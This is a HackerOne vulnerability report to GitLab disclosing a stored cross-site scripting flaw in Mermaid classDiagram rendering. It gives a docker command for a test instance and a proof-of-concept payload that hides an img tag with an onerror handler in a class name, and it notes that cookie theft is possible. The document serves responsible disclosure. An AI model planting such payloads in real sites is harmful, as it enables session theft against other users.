Stored XSS via Mermaid (classDiagram)

HackerOne report #1390391 by solov9ev on 2021-11-03, assigned to GitLab Team:

Report | Attachments | How To Reproduce

Report

Summary

Hi, Security Team!

I discovered a stored xss vulnerability via Mermaid (classDiagram).

Steps to reproduce

• Run Gitlab docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest (GitLab Enterprise Edition 14.4.1-ee)

• Insert into any field that supports markdown with using Mermaid the following payload (classDiagram):

classDiagram  
class Square~<img/src='1'/onerror=alert()>~{  
    int id  
    List~int~ position  
    setPoints(List~int~ points)  
    getPoints() List~int~  
}

Square : -List~string~ messages  
Square : +setMessages(List~string~ messages)  
Square : +getMessages() List~string~  

Impact

With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• 1.png
• 2.png

How To Reproduce

Please add reproducibility information to this section: